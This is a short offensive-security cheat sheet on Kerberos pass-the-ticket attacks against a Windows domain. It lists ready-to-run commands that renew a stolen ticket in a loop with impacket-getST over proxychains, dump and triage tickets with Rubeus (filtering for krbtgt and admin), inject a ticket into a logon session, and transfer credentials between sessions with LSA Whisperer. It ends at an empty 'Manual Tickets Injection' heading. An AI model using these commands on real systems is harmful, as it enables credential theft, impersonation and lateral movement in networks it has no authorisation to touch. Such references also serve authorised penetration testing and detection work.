Pass-the-Ticket
$ while true; do KRB5CCNAME=j.doe@[email protected] proxychains4 -q impacket-getST -k -no-pass megacorp.local/j.doe -spn krbtgt/megacorp.local -renew; sleep 3600; done

Rubeus
PS > .\Rubeus.exe triage | findstr krbtgt | findstr admin
PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap
PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>

LSA Whisperer
lsa> kerberos TransferCredentials --sluid <SRC_LUID> --dluid <DST_LUID>

Manual Tickets Injection